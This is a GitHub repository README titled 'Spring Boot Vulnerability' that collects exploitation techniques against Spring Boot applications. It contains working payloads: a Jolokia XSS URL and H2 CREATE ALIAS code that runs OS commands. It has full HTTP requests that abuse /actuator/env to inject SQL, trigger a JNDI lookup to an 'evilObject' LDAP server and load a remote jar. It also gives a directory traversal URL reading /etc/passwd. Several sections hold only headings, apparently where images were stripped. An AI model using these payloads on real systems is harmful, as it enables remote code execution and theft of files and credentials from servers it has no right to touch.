├── README.md ├── h2-console.png ├── h2db-alias.png ├── h2db-alias2.png ├── h2db-jndi.png ├── jmx.png ├── jmx2.png ├── jndi.gif ├── jolokia.png ├── mybatis.gif └── urlclassloader.gif /README.md: -------------------------------------------------------------------------------- 1 | # Spring Boot Vulnerability (Keep On Updating) 2 | 3 | ### 0x01 Spring Boot Actuator Exposed 4 | 5 | Actuator endpoints allow you to monitor and interact with your Spring application. Spring Boot includes a number of built-in endpoints and you can also add your own. For example the health endpoint provides basic application health information. The following endpoints are available: 6 | 7 | * ##### /autoconfig - Displays an auto-configuration report showing all auto-configuration candidates and the reason why they 'were' or 'were not' applied. 8 | * ##### /beans - Displays a complete list of all the Spring beans in your application. 9 | * ##### /configprops - Displays a collated list of all @ConfigurationProperties. 10 | * ##### /dump - Performs a thread dump. 11 | * ##### /heapdump - JVM heap dump information. Actually it is a binary file, you can utilize the tool named ``MemoryAnalyzer`` to analyze the file. Sometimes in this file maybe you can find ``PASSWORD / ACCESS_KEY / COOKIES / ACCESS_TOKEN`` or some sensitive information. 12 | * ##### /env - Exposes properties from Spring's ConfigurableEnvironment. 13 | * ##### /health - Shows application health information (a simple 'status' when accessed over an unauthenticated connection or full message details when authenticated). 14 | * ##### /info - Displays arbitrary application info. 15 | * ##### /metrics - Shows 'metrics' information for the current application. 16 | * ##### /mappings - Displays a collated list of all @RequestMapping paths. 17 | * ##### /shutdown - Allows the application to be gracefully shutdown (not enabled by default). 18 | * ##### /pause - Allows the application to be gracefully pause (not enabled by default). 19 | * ##### /resume - Allows the application to be gracefully resume (not enabled by default). 20 | * ##### /trace - Displays trace information (by default the last few HTTP requests). 21 | 22 | 23 | ### 0x02 Spring Boot RCE/XSS involving Jolokia 24 | 25 | #### 0x001 Jolokia RCE 26 | 27 | 28 | 29 | 30 | 31 | #### 0x002 Jolokia XSS fixed since Jolokia ``1.5.0`` (CVE-2018-1000129) 32 | 33 | pom.xml 34 | 35 | ``` 36 | 37 | org.jolokia 38 | jolokia-core 39 | 1.4.0 40 | 41 | ``` 42 | 43 | When visiting URL ``http://127.0.0.1:10090/actuator/jolokia/read%3Csvg%20onload=alert('xss')%3E?mimeType=text/html`` 44 | 45 | 46 | 47 | 48 | ### 0x03 Spring Boot RCE involving H2 Database JNDI Injection 49 | 50 | pom.xml 51 | 52 | ``` 53 | 54 | org.springframework.boot 55 | spring-boot-starter-data-jpa 56 | 2.2.6.RELEASE 57 | 58 | 59 | 60 | com.h2database 61 | h2 62 | runtime 63 | 1.4.2 64 | 65 | ``` 66 | application.properties 67 | 68 | ``` 69 | spring.h2.console.enabled=true 70 | spring.h2.console.settings.web-allow-others=true 71 | ``` 72 | 73 | You can visit ``/actutor/env`` to make sure ``H2 Console`` is enabled. 74 | 75 | 76 | 77 | 78 | 79 | ##### Example 1: Execute ``open -a Calculator`` Command 80 | 81 | 82 | 83 | 84 | ### 0x04 Spring Boot RCE involving H2 Database ``ALIAS`` Command 85 | 86 | 87 | 88 | ##### Example 1: Execute ``id`` Command 89 | ``` 90 | CREATE ALIAS EXECMD AS $$ String execmd(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$; 91 | 92 | CALL EXECMD('id') 93 | ``` 94 | 95 | ##### Example 2: Execute ``open -a Calculator`` Command 96 | 97 | ``` 98 | CREATE ALIAS EXECMD AS $$ String execmd(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd);return null; }$$; 99 | 100 | CALL EXECMD('open -a Calculator'); 101 | ``` 102 | 103 | 104 | 105 | 106 | 107 | ### 0x05 Spring Boot RCE involving JMX enabled 108 | 109 | When visiting URL ``http://127.0.0.1:10090/actuator/env/spring.jmx.enabled``, you will find JMX is enabled. 110 | 111 | 112 | 113 | 114 | 115 | ##### Example 1: Execute ``open -a Calculator`` Command 116 | 117 | 118 | 119 | 120 | 121 | ### 0x06 Spring Boot RCE involving H2 Database 122 | 123 | #### 0x001 Remote Code Execution via ``spring.datasource.hikari.connection-test-query``or``spring.datasource.hikari.connection-init-sql`` 124 | 125 | ##### Example 1: ``spring.datasource.hikari.connection-init-sql`` 126 | 127 | Step 1: 128 | 129 | ``` 130 | POST /actuator/env HTTP/1.1 131 | Host: 127.0.0.1:10090 132 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 133 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 134 | Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 135 | Accept-Encoding: gzip, deflate 136 | Connection: close 137 | Content-Type: application/json 138 | Content-Length: 280 139 | 140 | {"sourceType": "com.zaxxer.hikari.HikariDataSource","name":"spring.datasource.hikari.connection-init-sql","value":"CREATE ALIAS EXECMD AS $$ String execmd(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd);return null; }$$;CALL EXECMD('open -a Calculator');"} 141 | ``` 142 | 143 | Step 2: 144 | 145 | ``` 146 | POST /actuator/restart HTTP/1.1 147 | ``` 148 | 149 | 150 | #### 0x002 JNDI Injection 151 | 152 | 153 | 154 | Step 1: 155 | 156 | ``` 157 | POST /actuator/env HTTP/1.1 158 | Host: 127.0.0.1:10090 159 | Cache-Control: max-age=0 160 | Upgrade-Insecure-Requests: 1 161 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 162 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 163 | Accept-Encoding: gzip, deflate 164 | Content-Type: application/json 165 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,fr;q=0.6 166 | Connection: close 167 | Content-Length: 320 168 | 169 | { 170 | "name": "spring.datasource.hikari.connection-init-sql", 171 | "value": "CREATE ALIAS jndi AS $$ import javax.naming.InitialContext;@CODE String jndi(String url) throws Exception {new InitialContext().lookup(url);return null;}$$;CALL jndi('ldap://127.0.0.1:1389/evilObject');" 172 | } 173 | 174 | ``` 175 | Step 2: 176 | 177 | ``` 178 | POST /actuator/restart HTTP/1.1 179 | ``` 180 | 181 | #### 0x003 URL Classloader 182 | 183 | 184 | 185 | Step 1: 186 | ``` 187 | POST /actuator/env HTTP/1.1 188 | Host: 127.0.0.1:10090 189 | Cache-Control: max-age=0 190 | Upgrade-Insecure-Requests: 1 191 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 192 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 193 | Accept-Encoding: gzip, deflate 194 | Content-Type: application/json 195 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,fr;q=0.6 196 | Connection: close 197 | Content-Length: 320 198 | 199 | { 200 | "name": "spring.datasource.hikari.connection-init-sql", 201 | "value": "CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception { Class.forName (\"pop\", true, new URLClassLoader(new URL[]{new URL(\"http://127.0.0.1:9001/pop.jar\")})).newInstance();return null;}$$;CALL remoteUrl()" 202 | } 203 | ``` 204 | 205 | Step 2: 206 | 207 | ``` 208 | POST /actuator/restart HTTP/1.1 209 | ``` 210 | 211 | 212 | ### 0x07 Spring Boot RCE involving MyBatis (CVE-2020-26945) 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | ### 0x08 Spring Boot Actuator Logview Directory Traversal (CVE-2021-21234) 222 | 223 | ![image](https://user-images.githubusercontent.com/41412951/137893950-bf279b64-78aa-485e-8c2b-bd7668fae2d5.png) 224 | 225 | #### Set Break Piont At ``securityCheck()`` 226 | 227 | ![image](https://user-images.githubusercontent.com/41412951/137893019-8cdca05b-b189-40ce-87ce-c1a62455e666.png) 228 | 229 | ![image](https://user-images.githubusercontent.com/41412951/137891437-a85f24ce-2635-47c5-8eae-bba7f75f56ff.png) 230 | 231 | #### Construct Directory Traversal Request URL 232 | `` http://localhost:8887/manage/log/view?filename=/etc/passwd&base=../../../../../ `` 233 | 234 | #### Step Into 235 | ![image](https://user-images.githubusercontent.com/41412951/137891730-32a996d1-176c-4be9-8b44-29eac6e09850.png) 236 | 237 | #### Step Into 238 | ``spring.log/../../../../../`` as folder, and ``/etc/passwd`` is the file we want 239 | ![image](https://user-images.githubusercontent.com/41412951/137891802-09682c91-e66d-4ff5-8c7f-9d5f9ce2f68b.png) 240 | 241 | #### Step Into 242 | In toFile() , the folder ``spring.log/../../../../../`` and the file ``/etc/passwd`` will be concated as path without ``securityCheck()`` 243 | ![image](https://user-images.githubusercontent.com/41412951/137892318-8128b2a9-bcf6-44f2-afda-3bfbcdc7dea5.png) 244 | 245 | #### Retreive the content of file `` /etc/passwd `` 246 | ![image](https://user-images.githubusercontent.com/41412951/137893203-1f365483-5c96-4577-82b2-dec631bbc711.png) 247 | 248 | 249 | ### 0x09 Spring Boot Log4j2 JNDI Injection 250 | 251 | 252 | 253 | 254 | -------------------------------------------------------------------------------- /h2-console.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pyn3rd/Spring-Boot-Vulnerability/883ef211337210e96a859f6e9b87ace0c3f3cda8/h2-console.png -------------------------------------------------------------------------------- /h2db-alias.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pyn3rd/Spring-Boot-Vulnerability/883ef211337210e96a859f6e9b87ace0c3f3cda8/h2db-alias.png -------------------------------------------------------------------------------- /h2db-alias2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pyn3rd/Spring-Boot-Vulnerability/883ef211337210e96a859f6e9b87ace0c3f3cda8/h2db-alias2.png -------------------------------------------------------------------------------- /h2db-jndi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pyn3rd/Spring-Boot-Vulnerability/883ef211337210e96a859f6e9b87ace0c3f3cda8/h2db-jndi.png -------------------------------------------------------------------------------- /jmx.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pyn3rd/Spring-Boot-Vulnerability/883ef211337210e96a859f6e9b87ace0c3f3cda8/jmx.png -------------------------------------------------------------------------------- /jmx2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pyn3rd/Spring-Boot-Vulnerability/883ef211337210e96a859f6e9b87ace0c3f3cda8/jmx2.png -------------------------------------------------------------------------------- /jndi.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pyn3rd/Spring-Boot-Vulnerability/883ef211337210e96a859f6e9b87ace0c3f3cda8/jndi.gif -------------------------------------------------------------------------------- /jolokia.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pyn3rd/Spring-Boot-Vulnerability/883ef211337210e96a859f6e9b87ace0c3f3cda8/jolokia.png -------------------------------------------------------------------------------- /mybatis.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pyn3rd/Spring-Boot-Vulnerability/883ef211337210e96a859f6e9b87ace0c3f3cda8/mybatis.gif -------------------------------------------------------------------------------- /urlclassloader.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pyn3rd/Spring-Boot-Vulnerability/883ef211337210e96a859f6e9b87ace0c3f3cda8/urlclassloader.gif --------------------------------------------------------------------------------